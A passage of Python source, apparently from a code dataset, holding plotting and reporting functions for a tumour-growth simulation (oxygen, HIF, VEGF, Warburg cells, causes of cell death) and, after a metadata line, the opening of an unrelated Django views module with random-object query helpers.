Parameters\n ----------\n models : list\n\n Returns\n -------\n list\n The aforementioned list\n \"\"\"\n\n return np.mean(\n [m.output[\"endothelialCellProperties\"][\"avgVegf\"] for m in models],\n axis=0)\n\n\ndef get_avg_tumour_volume(models):\n \"\"\"\n Given a set of model lites, returns a list of average tumour volumes for\n each epoch.\n\n Parameters\n ----------\n models : list\n The set of models lite (eg: As obtained through getModels)\n\n Returns\n -------\n list\n The aforementioned list\n \"\"\"\n\n return np.mean([m.output[\"maxDistances\"] for m in models], axis=0)\n\n\ndef get_avg_num_warburg_cells(models):\n \"\"\"\n Given a set of model lites, returns a list of PERCENTAGE fo warburg\n cells for each epoch.\n\n Parameters\n ----------\n models : list\n The set of models lite (eg: As obtained through getModels)\n\n Returns\n -------\n list\n The aforementioned list\n \"\"\"\n return np.mean(\n [m.output[\"cancerCellProperties\"][\"numWarburgCells\"] for m in models],\n axis=0)\n\n\ndef get_post_execution_analysis(target_dir, imgs_dir=\"imgs\"):\n \"\"\"\n Given a set of pickle lite objects, one for each end-state of models (eg\n as generated via the runModels function) this\n runs all post-execution analysis to generate relevant scatters and saves\n them to a specified directory. Average\n values across all execution are used to generate these EXCEPT FOR (see\n below):\n\n Parameters\n ----------\n target_dir : string\n The report dir, this is returned by the runModels function\n imgs_dir : string\n The directory where the images will be saved (it is created if it\n does not exist)\n \"\"\"\n\n imgs_path = \"%s/%s\" % (target_dir, imgs_dir)\n if not os.path.exists(imgs_path):\n os.mkdir(imgs_path)\n\n pickles = [f for f in os.listdir(target_dir) if f.endswith(\".pickle\")]\n\n if len(pickles) != 1:\n print(\"Expecting one pickle object, found {0}: {1}\".format(\n len(pickles), \",\".join(pickles)))\n\n model = depickle_from_lite(\"{0}/{1}\".format(target_dir, pickles[0]))\n\n c = CancerCell(model)\n get_hif_from_oxygen(c, out_path=imgs_path, interval=0.001)\n get_metabolic_rate_from_hif(c, out_path=imgs_path, interval=0.001)\n get_probability_synthesis_from_hif(c, out_path=imgs_path, interval=0.001)\n get_vegf_secretion_rate_from_hif_concentration(\n c,\n out_path=imgs_path,\n interval=0.001)\n c.warburg_switch = True\n get_hif_from_oxygen(\n c,\n out_path=imgs_path,\n interval=0.001,\n suffix=\"warburg\")\n\n models = [model]\n post_execution_agent_num_visualizer(\n render=False,\n num_agents=get_avg_num_agents(models),\n out_path=imgs_path)\n post_execution_cancer_cell_properties_visualizer(\n render=False,\n avg_props=get_avg_cancer_props(models),\n out_path=imgs_path)\n vegf_stimulus_viewer(\n render=False,\n avg_vegf_stimulus=get_avg_vegf_stimulus(models),\n out_path=imgs_path)\n post_execution_oxygen_concentration_visualizer(\n render=False,\n avgProps=get_avg_oxygen_concentrations(models),\n out_path=imgs_path)\n tumour_volume_viewer(\n render=False,\n avg_tumour_volume=get_avg_tumour_volume(models),\n out_path=imgs_path)\n warburg_num_viewer(\n render=False,\n avg_warburg_cells=get_avg_num_warburg_cells(models),\n out_path=imgs_path)\n\n visualize_glucose_distributions(\n model.output[\"cancerCellProperties\"][\"GlucoseDistributions\"],\n out_path=imgs_path)\n visualize_oxygen_distributions(\n model.output[\"cancerCellProperties\"][\"OxygenDistributions\"],\n out_path=imgs_path)\n\n visualize_final_summary_cancer_cell_death(\n model.output[\"causesOfDeath\"],\n 
out_path=imgs_path)\n output_avg_age_cell_death(\n model.output[\"causesOfDeath\"],\n out_path=imgs_path)\n save_oxygen_distributions(\n model.output[\"cancerCellProperties\"][\"OxygenDistributions\"], imgs_path)\n save_glucose_distributions(\n model.output[\"cancerCellProperties\"][\"GlucoseDistributions\"],\n imgs_path)\n save_hif_distributions(model.output[\"cancerCellProperties\"][\n \"HIFExpressionRatesDistributions\"], imgs_path)\n\n oxygen_dists = model.output[\"cancerCellProperties\"][\"OxygenDistributions\"]\n hif_dists = model.output[\"cancerCellProperties\"][\n \"HIFExpressionRatesDistributions\"]\n\n if len(oxygen_dists) > 0 and len(hif_dists) > 0:\n save_final_oxygen_hif_distributions(oxygen_dists, hif_dists, imgs_path)\n\n\ndef visualize_glucose_distributions(glucose_distributions, out_path):\n \"\"\"\n Creates a scatter used to show average, maximum and minimum glucose\n concentrations for each epoch.\n\n Parameters\n ----------\n glucose_distributions : list\n An appropriate data-structure of concentrations as created by\n GlucoseConcentrationWatcher\nhelper\n out_path : string\n The location where the file will be saved\n \"\"\"\n maxes = []\n mins = []\n avgs = []\n\n for i, d in enumerate(glucose_distributions):\n mn = d[\"bins\"][0]\n mx = d[\"bins\"][-1]\n\n accumulator = 0\n\n for i in range(len(d[\"n\"])):\n accumulator += d[\"n\"][i] * d[\"bins\"][i]\n\n avg = accumulator / sum(d[\"n\"])\n\n avgs.append(avg)\n\n mins.append(mn)\n maxes.append(mx)\n\n plt.figure()\n plt.scatter(range(len(maxes)), maxes, label=\"max\")\n plt.scatter(range(len(maxes)), mins, label=\"min\")\n plt.scatter(range(len(maxes)), avgs, label=\"avg\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Glucose\")\n plt.title(\"Glucose in Tumour\")\n plt.legend()\n plt.savefig(\"%s/glucose_concentrations_timeline.png\" % out_path)\n\n\ndef visualize_oxygen_distributions(oxygen_distributions, out_path):\n \"\"\"\n Creates a scatter used to show average, maximum and minimum oxygen\n concentrations for each epoch.\n Parameters\n ----------\n oxygen_distributions : object\n An appropriate data-structure of concentrations as created by\n OxygenConcentrationWatcher helper\n out_path : string\n The location where the file will be saved\n \"\"\"\n maxes = []\n mins = []\n avgs = []\n\n for i, d in enumerate(oxygen_distributions):\n mn = d[\"bins\"][0]\n mx = d[\"bins\"][-1]\n\n accumulator = 0\n\n for i in range(len(d[\"n\"])):\n accumulator += d[\"n\"][i] * d[\"bins\"][i]\n\n avg = accumulator / sum(d[\"n\"])\n\n avgs.append(avg)\n\n mins.append(mn)\n maxes.append(mx)\n\n plt.figure()\n plt.scatter(range(len(maxes)), maxes, label=\"max\")\n plt.scatter(range(len(maxes)), mins, label=\"min\")\n plt.scatter(range(len(maxes)), avgs, label=\"avg\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Oxygen (mmHg)\")\n plt.title(\"Oxygen in Tumour\")\n plt.legend()\n plt.savefig(\"%s/oxygen_concentrations_timeline.png\" % out_path)\n\n\ndef output_avg_age_cell_death(causes_of_death, out_path):\n \"\"\"\n For each category of cell (warburgDeathGlucose, warburgDeathOxygen,\n nonWarburgDeathGlucose, nonWarburgDeathOxygen) it prints the average age\n at\n which the cell died (and standard deviation).\n\n Parameters\n ----------\n causes_of_death : list\n Causes of Death array, as created by DeathCauseWatcher helper\n out_path : string\n Location where the file will be saved\n \"\"\"\n causes_of_death = causes_of_death[-1]\n\n with open(\"%s/ageOfDeath.csv\" % out_path, \"w\") as f:\n f.write(\"class,avg,stDev\\n\")\n 
f.write(\"warburgGlucose,%s,%s\\n\" % (\n causes_of_death[\"warburgDeathGlucose\"][\"avgAge\"],\n causes_of_death[\"warburgDeathGlucose\"][\"stDev\"]))\n f.write(\"warburgOxygen,%s,%s\\n\" % (\n causes_of_death[\"warburgDeathOxygen\"][\"avgAge\"],\n causes_of_death[\"warburgDeathOxygen\"][\"stDev\"]))\n f.write(\"nonWarburgGlucose,%s,%s\\n\" % (\n causes_of_death[\"nonWarburgDeathGlucose\"][\"avgAge\"],\n causes_of_death[\"nonWarburgDeathGlucose\"][\"stDev\"]))\n f.write(\"nonwarburgOxygen,%s,%s\\n\" % (\n causes_of_death[\"nonWarburgDeathOxygen\"][\"avgAge\"],\n causes_of_death[\"nonWarburgDeathOxygen\"][\"stDev\"]))\n f.close()\n\n\ndef visualize_final_summary_cancer_cell_death(causes_of_death, out_path):\n \"\"\"\n Visualizes, for the last epoch, the cumulative sum of cancer cell death\n cause.\n Parameters\n ----------\n causes_of_death : list\n A list of dictionaries bound to the causesOfDeath model property,\n as generated by DeathCauseWatcher helper\n out_path : string\n Directory where the pictures will be saved\n \"\"\"\n causes_of_death = causes_of_death[-1]\n\n warburg_glucose = causes_of_death[\"warburgDeathGlucose\"][\"num\"]\n warburg_oxygen = causes_of_death[\"warburgDeathOxygen\"][\"num\"]\n non_warburg_oxygen = causes_of_death[\"nonWarburgDeathOxygen\"][\"num\"]\n non_warburg_glucose = causes_of_death[\"nonWarburgDeathGlucose\"][\"num\"]\n\n plt.figure()\n plt.title(\"Causes of Death\")\n plt.ylabel(\"Number of Agents\")\n labels = [\"warburg_glucose\", \"non_warburg_oxygen\", \"non_warburg_glucose\",\n \"warburg_oxygen\"]\n plt.bar([0, 1, 2, 3],\n [warburg_glucose, non_warburg_oxygen, non_warburg_glucose,\n warburg_oxygen])\n plt.xticks([0, 1, 2, 3], labels)\n plt.savefig(\"%s/causesOfDeath.png\" % out_path)\n plt.close()\n\n\ndef save_final_oxygen_hif_distributions(oxygen_distributions,\n hif_distributions, imgs_path):\n \"\"\"\n Saves final stacked bar charts representing end-state oxygen and hif\n distributions.\n\n Parameters\n ----------\n oxygen_distributions : list\n Oxygen distributions at end\n hif_distributions : list\n HIF distributions at end\n imgs_path : string\n Path to save image\n \"\"\"\n fig = plt.figure()\n fig.add_subplot(1, 2, 1)\n\n concentrations_at_end = hif_distributions[-1]\n concentrations_zipped = [\n (concentrations_at_end[\"bins\"][i], concentrations_at_end[\"n\"][i]) for i\n in range(len(concentrations_at_end[\"bins\"]) - 1)]\n\n basic = [c for c in concentrations_zipped if c[0] < 2]\n basic = sum(b[1] for b in basic)\n step = 2\n intervals = np.arange(2, 16, step)\n enhanceds = []\n for i in intervals:\n enhanceds.append((\n \"%s-%s\" % (str(round(i, 2)), str(round(i + step, 2))),\n sum(c[1] for c in concentrations_zipped if\n i <= c[0] < i + step)))\n total = basic + sum(e[1] for e in enhanceds)\n\n plt.bar([0], basic / total)\n enhanceds_percentage = [(e[0], e[1] / total) for e in enhanceds]\n accumulator = 0\n plt.bar([1], enhanceds_percentage[0][1], label=enhanceds[0][0])\n accumulator += enhanceds_percentage[0][1]\n\n del enhanceds[0]\n\n for e in enhanceds_percentage:\n plt.bar([1], e[1], label=e[0], bottom=accumulator)\n accumulator += e[1]\n\n plt.legend()\n plt.xticks([0, 1], [\"base\", \"enhanced\"])\n plt.title(\"Distribution of HIF Expression Rates\")\n plt.ylabel(\"Number of Cells (Percentage)\")\n totalOxygen = total\n\n concentrations_at_end = oxygen_distributions[-1]\n concentrations_zipped = [\n (concentrations_at_end[\"bins\"][i], concentrations_at_end[\"n\"][i]) for i\n in range(len(concentrations_at_end[\"bins\"]) - 
1)]\n fig.add_subplot(1, 2, 2)\n\n hypoxics = []\n step = 0.05\n intervals = np.arange(0, 0.2, step)\n for i in intervals:\n hypoxics.append((\"%s%% to %s%%\" % (\n str(round(i, 2)), str(round(i + step, 2))), sum(\n c[1] for c in concentrations_zipped if i <= c[0] < i + step)))\n\n normoxics = [c[1] for c in concentrations_zipped if c[0] >= i + step]\n\n tot_hypoxics = sum(h[1] for h in hypoxics)\n tot_normoxics = sum(normoxics)\n total = tot_normoxics + tot_hypoxics\n\n hypoxics = [(h[0], h[1] / total) for h in hypoxics]\n\n plt.bar([0], tot_normoxics / total)\n\n plt.bar([1], hypoxics[0][1], label=hypoxics[0][0])\n prev = hypoxics[0][1]\n\n del hypoxics[0]\n\n for h in hypoxics:\n plt.bar([1], h[1], label=h[0], bottom=prev)\n prev += h[1]\n\n plt.xticks([0, 1], [\"normoxic\", \"hypoxic\"])\n plt.ylabel(\"Number of Cells (Percentage)\")\n plt.title(\"Distribution of Oxygen Concentrations\")\n plt.legend()\n plt.text(-3, 0, \"Total Agents Oxygen %s - Total Agents HIF %s\" % (\n str(totalOxygen), str(total)))\n plt.savefig(\"%s/oxygen_hif_distributions_end.png\" % imgs_path)\n\n\ndef save_glucose_distributions(distributions, imgs_path,\n distributions_folder_name=\"glucoseDistributions\"\n ):\n \"\"\"\n From a single model loads and saves figures representing glucose\n concentration distributions\n Parameters\n ----------\n distributions : string\n List of distributions generated by GlucoseConcentratrionWatcher\n imgs_path : string\n Directory where subdirectory will be created\n distributions_folder_name : string, optional\n name of directory where figures will be saved. Defaults to\n glucoseDistributions\n \"\"\"\n distributions_dir = \"%s/%s\" % (imgs_path, distributions_folder_name)\n\n if not os.path.exists(distributions_dir):\n os.mkdir(distributions_dir)\n\n for d in distributions:\n plt.figure()\n n_percentage = [n / sum(d[\"n\"]) for n in d[\"n\"]]\n\n plt.bar(d[\"bins\"][:-1], n_percentage, width=1)\n plt.xlabel(\"GlucoseConcentration\")\n plt.ylabel(\"Amount of Cancer Cells(Percentage)\")\n plt.title(\"Glucose Concentration in Tumour\")\n plt.savefig(\"%s/distribution_%s.png\" % (distributions_dir, d[\"epoch\"]))\n plt.close()\n\n\ndef save_oxygen_distributions(distributions, imgs_path,\n distributions_folder_name=\"oxygenDistributions\"):\n \"\"\"\n From a single model loads and saves figures representing oxygen\n concentration distributions\n\n Parameters\n ----------\n distributions : list\n List of distributions generated by OxygenConcentratrionWatcher\n imgs_path : string\n Directory where subdirectory will be created\n distributions_folder_name : string, optional\n name of directory where figures will be saved. 
Defaults to\n oxygenDistributions\n \"\"\"\n distributions_dir = \"%s/%s\" % (imgs_path, distributions_folder_name)\n\n if not os.path.exists(distributions_dir):\n os.mkdir(distributions_dir)\n\n for d in distributions:\n plt.figure()\n n_percentage = [n / sum(d[\"n\"]) for n in d[\"n\"]]\n\n plt.bar(d[\"bins\"][:-1], n_percentage, width=1)\n plt.xlim([d[\"bins\"][0] - 1, d[\"bins\"][-1] + 1])\n plt.xlabel(\"PPO2 (mmHg)\")\n plt.ylabel(\"Amount of Cancer Cells(Percentage)\")\n plt.title(\"Oxygen Concentration in Tumour\")\n plt.savefig(\"%s/distribution_%s.png\" % (distributions_dir, d[\"epoch\"]))\n plt.close()\n\n\ndef save_hif_distributions(distributions, imgs_path,\n distributions_folder_name=\"HIFDistributions\"):\n \"\"\"\n From a single model loads and saves figures representing hif\n concentration distributions\n\n Parameters\n ----------\n distributions : list\n List of distributions generated by CancerCellWatcher\n imgs_path : string\n Directory where subdirectory will be created\n distributions_folder_name : string, optional\n Name of directory where figures will be saved. Optional, defaults to\n HIFDistributions\n \"\"\"\n distributions_dir = \"%s/%s\" % (imgs_path, distributions_folder_name)\n\n if not os.path.exists(distributions_dir):\n os.mkdir(distributions_dir)\n\n for d in distributions:\n plt.figure()\n n_percentage = [n / sum(d[\"n\"]) for n in d[\"n\"]]\n\n plt.bar(d[\"bins\"][:-1], n_percentage, width=1)\n plt.xticks(np.arange(1, 16, 1))\n plt.xlabel(\"HIF Expression Rate\")\n plt.ylabel(\"Amount of Cancer Cells(Percentage)\")\n plt.title(\"HIF Expression Rates in Tumour\")\n plt.savefig(\"%s/distribution_%s.png\" % (distributions_dir, d[\"epoch\"]))\n plt.close()\n\n\ndef post_execution_agent_num_visualizer(model=None, num_agents=None,\n render=True, out_path=None):\n \"\"\"\n Creates a scatter plot summarizing the amount of each agent type at each\n epoch.\n\n Parameters\n ----------\n model : Model\n The model object\n num_agents : A dictionary containing agent numbers at each epoch\n render : bool, optional\n Defaults to true, if true the scatters are displayed\n out_path : string, optional\n Defaults ot none, if not none the figure is saved to\n out_path/numAgents.png, or a path can be specified\n \"\"\"\n if model is None and num_agents is None:\n print(\"Need to provide model or dictionary of agents nums\")\n exit()\n\n if model is not None:\n num_cancer = model.output[\"agentNums\"][\"cancerCells\"]\n tip_cells = model.output[\"agentNums\"][\"tipCells\"]\n alive_cancer_cells = model.output[\"agentNums\"][\"aliveCancerCells\"]\n dead_cancer_cells = model.output[\"agentNums\"][\"deadCancerCells\"]\n else:\n num_cancer = num_agents[\"cancerCells\"]\n tip_cells = num_agents[\"tipCells\"]\n alive_cancer_cells = num_agents[\"aliveCancerCells\"]\n dead_cancer_cells = num_agents[\"deadCancerCells\"]\n\n x_epochs = range(len(num_cancer))\n\n plt.figure()\n plt.scatter(x_epochs, num_cancer, label=\"Total Cancer Cells\")\n plt.scatter(x_epochs, alive_cancer_cells, label=\"Alive Cancer Cells\")\n plt.scatter(x_epochs, dead_cancer_cells, label=\"Dead Cancer Cells\")\n plt.legend()\n\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Number of Cancer Cells\")\n plt.title(\"Cancer Size in Time\")\n\n if out_path is not None:\n plt.savefig(\"%s/numCancerCells.png\" % out_path)\n\n plt.figure()\n plt.scatter(x_epochs, tip_cells)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Number of Endothelial Cells\")\n plt.title(\"Blood Vessel Development in Time\")\n\n if out_path is not None:\n 
plt.savefig(\"%s/numEndothelials.png\" % out_path)\n\n if render:\n plt.show()\n\n\ndef post_execution_oxygen_concentration_visualizer(model=None, avgProps=None,\n render=True, out_path=None):\n \"\"\"\n Creates a scatter for average, max and min oxygen concentrations in time.\n\n Parameters\n ----------\n model : Model\n The model object\n avgProps : dict\n Average oxygen properties\n render : bool, optional\n Defaults to true, if true the scatters are displayed\n out_path : string, optional\n Defaults ot none, if not none the figure is saved to\n out_path/numAgents.png\n \"\"\"\n\n if model is not None:\n avg_oxygen = model.output[\"cancerCellProperties\"][\"avgOxygen\"]\n max_oxygen = model.output[\"cancerCellProperties\"][\"maxOxygen\"]\n min_oxygen = model.output[\"cancerCellProperties\"][\"minOxygen\"]\n elif avgProps is not None:\n avg_oxygen = avgProps[\"avg_oxygen\"]\n min_oxygen = avgProps[\"min_oxygen\"]\n max_oxygen = avgProps[\"max_oxygen\"]\n else:\n print(\"Need to provide model or dictionary of oxygen properties\")\n exit()\n\n x_epochs = range(len(avg_oxygen))\n\n fig = plt.figure()\n\n fig.add_subplot(1, 3, 1)\n plt.scatter(x_epochs, avg_oxygen)\n plt.title(\"Average Oxygen in Time\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Oxygen Concentration\")\n\n fig.add_subplot(1, 3, 2)\n plt.scatter(x_epochs, max_oxygen)\n plt.title(\"Max Oxygen in Time\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Oxygen Concentration\")\n\n fig.add_subplot(1, 3, 3)\n plt.scatter(x_epochs, min_oxygen)\n plt.title(\"Minimum Oxygen in Time\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Oxygen Concentration\")\n\n if out_path is not None:\n fig.savefig(\"%s/oxygenConcentrations.png\" % out_path)\n\n if render:\n plt.show()\n\n\ndef post_execution_cancer_cell_properties_visualizer(model=None,\n avg_props=None,\n render=True,\n out_path=None):\n \"\"\"\n Creates a scatter showing the properteis of cancer cells in time\n Parameters\n ----------\n model : Model\n The model object\n avg_props : dict\n A dictionary containing average cancer cell properties at each epoch\n render : bool, optional\n Defaults to true, if true the scatters are displayed\n out_path : string, optional\n Defaults ot none, if not none the figure is saved to\n out_path/numAgents.png\n \"\"\"\n if model is None and avg_props is None:\n print(\"Need to provide model or dictionary of agents nums\")\n exit()\n\n if model is not None:\n avg_hif = model.output[\"cancerCellProperties\"][\"avgHif\"]\n avg_vegf = model.output[\"cancerCellProperties\"][\"avgVegf\"]\n avg_metabolic_rate = model.output[\"cancerCellProperties\"][\n \"avgMetabolicRate\"]\n avg_p_synthesis = model.output[\"cancerCellProperties\"][\"avgPSynthesis\"]\n else:\n avg_hif = avg_props[\"avgHif\"]\n avg_vegf = avg_props[\"avgVegf\"]\n avg_metabolic_rate = avg_props[\"avgMetabolicRate\"]\n avg_p_synthesis = avg_props[\"avgPSynthesis\"]\n\n x_epochs = range(len(avg_hif))\n\n rows = cols = 2\n fig = plt.figure()\n\n x_template = \"Avg %s\"\n y_template = \"Avg %s in time\"\n\n fig.add_subplot(rows, cols, 1)\n plt.scatter(x_epochs, avg_hif)\n plt.xlabel(\"Epoch\")\n target = \"HIF Expression\"\n plt.ylabel(x_template % target)\n plt.title(y_template % target)\n\n fig.add_subplot(rows, cols, 2)\n plt.scatter(x_epochs, avg_vegf)\n plt.xlabel(\"Epoch\")\n target = \"VEGF Expression Rate\"\n plt.ylabel(x_template % target)\n plt.title(y_template % target)\n\n fig.add_subplot(rows, cols, 3)\n plt.scatter(x_epochs, avg_metabolic_rate)\n plt.xlabel(\"Epoch\")\n target = \"Metabolic Rate\"\n 
plt.ylabel(x_template % target)\n plt.title(y_template % target)\n\n fig.add_subplot(rows, cols, 4)\n plt.scatter(x_epochs, avg_p_synthesis)\n plt.xlabel(\"Epoch\")\n target = \"Probability Progress in Synthesis\"\n plt.ylabel(x_template % target)\n plt.title(y_template % target)\n\n if out_path is not None:\n fig.savefig(\"%s/cancerCellProperties.png\" % out_path)\n\n if render:\n plt.show()\n\n\ndef get_hif_from_oxygen(cancer_cell, interval=10, render=False, out_path=None,\n suffix=\"\"):\n \"\"\"\n Given a cancer cell object, calculates hif expression rates for all\n oxygen PPO2 between 0 and 200\n\n Parameters\n ----------\n cancer_cell : CancerCell\n The cancer cell object\n interval : float, optional\n The x-interval (eg setting this to 0.1 will calculate for 0, 0.1,\n 0.2, ..., 0.9, 1) Defaults to 10\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n out_path : bool, optional\n If set to true, saves the figure to this path\n suffix : string, optional\n If set, will add a suffix to the end of the file name. Defaults to the\n empty string\n\n Returns\n -------\n list\n An array of tuples (oxygenConcentratoin, hif expression)\n\n \"\"\"\n concentrations = np.arange(0, 200, interval)\n if not cancer_cell.warburg_switch:\n hif_expressions = [\n cancer_cell._calculate_hif_expression_rate_from_oxygen(c)\n for c in concentrations]\n else:\n hif_expressions = [\n cancer_cell._calculate_hif_expression_rate_from_oxygen_warburg(c)\n for c in concentrations]\n\n plt.figure()\n plt.scatter(concentrations, hif_expressions)\n plt.xlabel(\"Oxygen Concentration\")\n plt.ylabel(\"Hif Expression Rate\")\n plt.title(\"HIF Expression Rate Across Multiple oxygen Concentrations\")\n\n if out_path is not None:\n plt.savefig(\"%s/oxygen_to_hif_%s.png\" % (out_path, suffix))\n\n if render:\n plt.show()\n return zip(concentrations, hif_expressions)\n\n\ndef get_metabolic_rate_from_hif(cancer_cell, interval=1, render=False,\n out_path=None):\n \"\"\"\n Given a cancer cell object, calculates metabolic rate for all hif\n expression rates between 1 and 15\n\n Parameters\n ----------\n cancer_cell : CancerCell\n The cancer cell object\n interval : float, optional\n The x-interval (eg setting this to 1 will calculate for 0, 1,2,3,\n ...,14, 15) Defaults to 1\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n out_path : string, optional\n If set to a value, saves the figure to this path. 
Defaults to None\n \"\"\"\n hif_rates = np.arange(1, 15, interval)\n\n def get_metabolic_rate(h, a):\n a.currentHifRate = h\n a._update_metabolic_rate()\n mr = a.current_metabolic_rate\n\n return mr\n\n metabolic_rates = [get_metabolic_rate(h, cancer_cell) for h in hif_rates]\n\n plt.figure()\n plt.scatter(hif_rates, metabolic_rates)\n plt.xlabel(\"HIF Expression Rate\")\n plt.ylabel(\"Metabolic Rate\")\n plt.legend()\n plt.title(\"Change in Metabolic Rate across HIF Expression Rates\")\n\n if out_path is not None:\n plt.savefig(\"%s/hif_to_metabolic_rate.png\" % out_path)\n\n if render:\n plt.show()\n\n return zip(hif_rates, metabolic_rates)\n\n\ndef get_probability_synthesis_from_hif(cancer_cell, interval=1, render=False,\n out_path=None):\n \"\"\"\n Given a cancer cell object, calculates the probability of the agent\n progressing into synthesis for all hif expression\n rates between 1 and 15\n\n Parameters\n ----------\n cancer_cell : CancerCell\n The cancer cell object\n interval : float, optional\n The x-interval (eg setting this to 1 will calculate for 0, 1,2,3,\n ...,14, 15) Defaults to 1\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n out_path : string, optional\n If set to a value, saves the figure to this path. Defaults to None\n \"\"\"\n hif_rates = np.arange(1, 15, interval)\n\n def get_p_synthesis(h, a):\n a.currentHifRate = h\n a._update_p_synthesis()\n mr = a.current_p_synthesis\n\n return mr\n\n probabilities = [get_p_synthesis(h, cancer_cell) for h in hif_rates]\n\n plt.figure()\n plt.scatter(hif_rates, probabilities)\n plt.xlabel(\"HIF Expression Rate\")\n plt.ylabel(\"Probability Synthesis\")\n plt.legend()\n plt.title(\n \"Change in Probability of Progressing into Synthesis across HIF \"\n \"Expression Rates\")\n\n if out_path is not None:\n plt.savefig(\"%s/hif_to_p_synthesis.png\" % out_path)\n\n if render:\n plt.show()\n\n return zip(hif_rates, probabilities)\n\n\ndef get_vegf_secretion_rate_from_hif_concentration(cancer_cell, interval=1,\n render=False,\n out_path=None):\n \"\"\"\n Given a cancer cell object, calculates its vegf secretion rate for all\n hif expression rates between 1 and 15\n\n Parameters\n ----------\n cancer_cell : CancerCell\n The cancer cell object\n interval : float, optional\n The x-interval (eg setting this to 1 will calculate for 0, 1,2,3,\n ...,14, 15) Defaults to 1\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n out_path : string, optional\n If set to a value, saves the figure to this path. 
Defaults to None\n \"\"\"\n hif_rates = np.arange(1, 15, interval)\n\n def get_vegf_secretion_rate(h, a):\n a.currentHifRate = h\n a._update_vegf_secretion_rate()\n mr = a.current_vegf_secretion_rate\n\n return mr\n\n rates = [get_vegf_secretion_rate(h, cancer_cell) for h in hif_rates]\n\n plt.figure()\n plt.scatter(hif_rates, rates)\n plt.xlabel(\"HIF Expression Rate\")\n plt.ylabel(\"VEGF Expression Rate\")\n plt.legend()\n plt.title(\"Change in VEGF ExpressionRates across HIF Expression Rates\")\n\n if out_path is not None:\n plt.savefig(\"%s/hig_to_vegf_secretion_rate.png\" % out_path)\n\n if render:\n plt.show()\n\n return zip(hif_rates, rates)\n\n\ndef warburg_num_viewer(avg_warburg_cells, out_path, render=False):\n \"\"\"\n Displays a scatter showing the average number of warburg cells in time\n Parameters\n ----------\n avg_warburg_cells : list\n Average number of warburg cells at each epoch.\n out_path : string, optional\n If set to a value, saves the figure to this path. Defaults to None\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n \"\"\"\n x_epochs = range(len(avg_warburg_cells))\n\n plt.figure()\n plt.scatter(x_epochs, avg_warburg_cells)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Avg Number of Warburg Cells (Percentage)\")\n plt.title(\"Average Number of Warburg Cells in Time\")\n\n if out_path is not None:\n plt.savefig(\"%s/warburgCells.png\" % out_path)\n\n if render:\n plt.show()\n\n\ndef tumour_volume_viewer(model=None, avg_tumour_volume=None, render=False,\n out_path=None):\n \"\"\"\n Produces a scatter showing tumour volume in time.\n\n Parameters\n ----------\n model : Model\n The model object\n avg_tumour_volume : dict\n A list containing average tumour volume\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n out_path : string, optional\n If set to a value, saves the figure to this path. Defaults to None\n \"\"\"\n if model is not None:\n avg_tumour_volume = model.output[\"maxDistances\"]\n x_epochs = range(len(avg_tumour_volume))\n\n plt.figure()\n plt.scatter(x_epochs, avg_tumour_volume)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Avg Tumour Volume\")\n plt.title(\"Average Tumour Volume in Time\")\n\n if out_path is not None:\n plt.savefig(\"%s/tumourVolume.png\" % out_path)\n\n if render:\n plt.show()\n\n\ndef vegf_stimulus_viewer(model=None, avg_vegf_stimulus=None, render=True,\n out_path=None):\n \"\"\"\n Produces a scatter showing average VEGF stimulus in time.\n\n Parameters\n ----------\n model : Model\n The model object\n avg_tumour_vegf_stimulus : dict\n A list containing average vegf stimulus in time\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n out_path : string, optional\n If set to a value, saves the figure to this path. 
Defaults to None\n \"\"\"\n\n if model is None and avg_vegf_stimulus is None:\n print(\"You must provide model or vegfStimulus\")\n exit()\n\n if model is not None:\n avg_vegf_stimulus = model.output[\"endothelialCellProperties\"][\n \"avgVegf\"]\n\n x_epochs = range(len(avg_vegf_stimulus))\n\n plt.figure()\n plt.scatter(x_epochs, avg_vegf_stimulus)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Avg VEGF Concentration\")\n plt.title(\"Average VEGF Concentration at Blood Vessels in Time\")\n\n if out_path is not None:\n plt.savefig(\"%s/vegfStimulus.png\" % out_path)\n\n if render:\n plt.show()\n","repo_name":"DarioPanada/warburg-investigation","sub_path":"analyzers/SingleReportModelAnalyzers.py","file_name":"SingleReportModelAnalyzers.py","file_ext":"py","file_size_in_byte":34870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22945378400","text":"import jieba\nimport json\nimport os\nimport random\nimport re\nimport zlib\n\nimport pymongo\nfrom bson import objectid\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.urlresolvers import reverse\nfrom django.db import connection\nfrom django.db.models import Q\nfrom django.http import (Http404, HttpResponse, HttpResponseRedirect,\n HttpResponseBadRequest)\nfrom django.shortcuts import get_object_or_404, render\nfrom django.utils.html import escape\nfrom django.views.decorators.http import require_http_methods\n\nfrom .models import (DBVersion, InfoboxTuple, InfoboxTupleLink, NamedEntity,\n NamedEntityAlias, Verb)\n\n\ndef random_objects(cls, count):\n total_ne_count_approx = approx_count_objects(cls)\n if total_ne_count_approx < 500:\n total_ne_count = cls.objects.all().count()\n\n random_count = min(count, total_ne_count)\n for i in range(0, random_count):\n random_index = random.randint(0, total_ne_count-1)\n randomed = cls.objects.all()[random_index]\n\n yield randomed\n else:\n for i in cls.objects.raw('''\n SELECT *\n FROM %s AS r1 JOIN\n (SELECT CEIL(RAND() *\n (SELECT MAX(id)\n FROM %s)) AS id)\n AS r2\n WHERE r1.id >= r2.id\n ORDER BY r1.id ASC\n LIMIT %d''' % (cls._meta.db_table, cls._meta.db_table, count)):\n yield i\n\ndef approx_count_objects(cls):\n cursor = connection.cursor()\n cursor.execute(\"SHOW TABLE STATUS WHERE NAME='%s'\" % cls._meta.db_table)\n return 